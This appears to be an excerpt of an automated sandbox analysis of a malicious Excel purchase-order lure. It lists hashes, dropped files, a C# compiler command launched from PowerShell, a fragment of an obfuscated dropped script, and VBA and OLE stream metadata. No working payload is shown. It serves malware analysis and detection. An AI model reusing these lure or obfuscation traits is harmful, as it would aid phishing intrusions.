                                                                SHA1:4EE6CD2F339DEECE4AAA6A2EF848F20EDEBC4E07
                                                                SHA-256:EB90A6DE0B348F1F3F0CED7693996D363A655A7345E90DA85D647D9A8E2EBDBD
                                                                SHA-512:F4DAD451457E6CB4B745B8914C8DA57BBD5DB8A3F6AAFE032DC5BFA43969666A8564630390C888E67474BEC99E315FF805B5D4D50ADD365A4F5B55FB4040BA5B
                                                                Malicious:false
                                                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 13 05:12:22 2024, Security: 1
                                                                Category:dropped
                                                                Size (bytes):1062912
                                                                Entropy (8bit):7.737295515647854
                                                                Encrypted:false
                                                                SSDEEP:24576:cBa0bARM8FX8Z+jHEkiz9qV4a/DvOVwq:cE5XXjH7izcVRzy
                                                                MD5:68769A3987D428B5EA051894CD500B9B
                                                                SHA1:9C4BD6E75B17F7E3B8E7DDFF499D369881B43F95
                                                                SHA-256:7FBE546031A49967888B620BE9D742BC3CFCDBFFDF065022C0DD2759EFA1FFFD
                                                                SHA-512:DEA381AC0C8246F1F3893055CCCA623369BBC37FDD07160EE8212649CDC3DD39BE04A35E1038E237C7DEEB32AAA35EFC3C2A35ADB4B0D3484C32F2F6819C5593
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:......................>........................................................... ...!..."...O...P...Q..............._.......}...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N...\.......................$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (3267), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):154006
                                                                Entropy (8bit):3.8112193041441667
                                                                Encrypted:false
                                                                SSDEEP:3072:3jl+x01Ehsnlxjjl+x01Ehsnl9jl+x01Ehsnle:3jlE0osnlxjjlE0osnl9jlE0osnle
                                                                MD5:F4FA61BB6C9F9721DED8D91D28EA7815
                                                                SHA1:10796E5D198B6007586D28F6EAF2E847F89EA51E
                                                                SHA-256:CBF1E928A1D028328AFCE5A494996571A51203D9C7E06EE78CD8AE1907F81F53
                                                                SHA-512:03CF806A49AC6FB1D739E986E81559241D2387AF2BB93DD443DEE04F8F7278D1CAD45116C46951D1888FD43922D232E6A9F1B49139C61E961EFEA0D2DE0B7013
                                                                Malicious:true
                                                                Preview:...... . . . .....B.Z.i.W.K.e.l.L.q.L.b.L.q.a.P. .=. .".A.P.N.C.B.k.x.G.W.a.c.h.W.n.L.".....t.b.i.b.m.a.j.q.i.C.c.f.P.W.W. .=. .".H.h.d.W.c.C.W.v.W.m.L.N.r.c.W.".....f.l.B.L.W.p.K.o.H.c.U.i.L.L.C. .=. .".L.W.r.z.Z.A.z.i.W.W.R.L.R.l.L.".........f.f.c.e.L.Q.Z.z.m.W.f.q.P.L.i. .=. .".k.N.Z.H.Z.t.W.c.G.p.Z.H.T.x.J.".....c.f.G.K.h.Z.C.e.L.h.m.Z.o.K.u. .=. .".W.Q.u.Q.v.L.L.Q.l.W.p.c.d.P.B.".....O.W.a.e.H.N.J.c.z.v.K.a.L.O.K. .=. .".p.l.n.h.I.P.R.j.O.a.H.n.f.b.o.".....e.A.t.H.K.n.A.K.U.S.O.W.P.i.W. .=. .".i.u.G.P.B.n.q.c.G.l.W.c.B.L.p.".....v.c.B.N.Z.d.n.L.A.p.i.c.k.j.U. .=. .".K.U.h.L.K.c.K.j.K.u.i.l.q.r.L.".....P.O.z.U.z.o.G.I.K.L.i.G.l.n.c. .=. .".e.z.p.a.o.f.h.l.K.L.c.Z.P.W.W.".....I.L.U.l.b.z.W.Z.c.K.W.m.k.e.b. .=. .".W.A.k.a.L.c.W.H.z.U.p.b.i.u.v.".....A.c.i.p.Z.l.L.i.g.e.K.c.e.U.n. .=. .".R.G.R.T.o.o.u.U.i.t.R.Z.p.l.U.".....W.z.W.N.k.T.L.o.Z.p.m.r.W.o.W. .=. .".o.f.K.c.x.q.C.l.i.S.j.e.N.A.L.".....G.l.z.Z.u.l.L.T.k.i.t.i.G.A.Q. .=. .".W.p.U.U.f.i.c.d.f.l.k.W.W.z.i.".....K.n.K.p.T.L.f.Z.
                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 13 05:12:22 2024, Security: 1
                                                                Entropy (8bit):7.737275711159626
                                                                TrID:
                                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                File name:NB PO-104105107108.xls
                                                                File size:1'062'912 bytes
                                                                MD5:ac8e858040a8cead91ef441f86c9cb40
                                                                SHA1:cfa17e7609799a0b1ecc49e2d542bc159af20f7a
                                                                SHA256:1272130e96664e18dfff89fc4e6017c3bbf17090f304df2b3a9c7f604b7ad54a
                                                                SHA512:ea213a1328c520c4f36237c28b993a4fe034dc0c678620777c26bb7880e86b971e4a8fc8ac4a4d7cfa7e238e2cb450bc0f2eb092947b6f4993103b5fb4ccff06
                                                                SSDEEP:24576:eBaUbARM8qr8Z+jUNkiz9qV4a/DvOVwq:eEmrXjUGizcVRzy
                                                                TLSH:C03501E5768DAB52DA09523575F3939E1314AC03E902427B36F8731D2EFB6D08903FA6
                                                                File Content Preview:........................>........................................................... ...!..."...O...P...Q..............._.......}..............................................................................................................................
                                                                Icon Hash:276ea3a6a6b7bfbf
                                                                Document Type:OLE
                                                                Number of OLE Files:1
                                                                Has Summary Info:
                                                                Application Name:Microsoft Excel
                                                                Encrypted Document:True
                                                                Contains Word Document Stream:False
                                                                Contains Workbook/Book Stream:True
                                                                Contains PowerPoint Document Stream:False
                                                                Contains Visio Document Stream:False
                                                                Contains ObjectPool Stream:False
                                                                Flash Objects Count:0
                                                                Contains VBA Macros:True
                                                                Code Page:1252
                                                                Author:
                                                                Last Saved By:
                                                                Create Time:2006-09-16 00:00:00
                                                                Last Saved Time:2024-12-13 05:12:22
                                                                Creating Application:Microsoft Excel
                                                                Security:1
                                                                Document Code Page:1252
                                                                Thumbnail Scaling Desired:False
                                                                Contains Dirty Links:False
                                                                Shared Document:False
                                                                Changed Hyperlinks:False
                                                                Application Version:786432
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                                VBA File Name:Sheet1.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet1"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                                VBA File Name:Sheet2.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet2"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                VBA File Name:ThisWorkbook.cls
                                                                Stream Size:985
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "ThisWorkbook"
                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                VBA File Name:Sheet1.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t U . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db 74 dc 55 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet1"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                VBA File Name:Sheet2.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db 74 92 7a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet2"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                VBA File Name:Sheet3.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db 74 e2 b8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet3"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                VBA File Name:ThisWorkbook.cls
                                                                Stream Size:985
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t h . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db 74 9a 68 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "ThisWorkbook"
                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.25248375192737
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:\x5DocumentSummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:244
                                                                Entropy:2.889430592781307
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                General
                                                                Stream Path:\x5SummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:200
                                                                Entropy:3.2503503175049815
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . ? . M . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                General
                                                                Stream Path:MBD0004282A/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:99
                                                                Entropy:3.631242196770981
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282A/Package
                                                                CLSID:
                                                                File Type:Microsoft Excel 2007+
                                                                Stream Size:12479
                                                                Entropy:7.09513886571729
                                                                Base64 Encoded:True
                                                                Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.25248375192737
                                                                Base64 Encoded:True
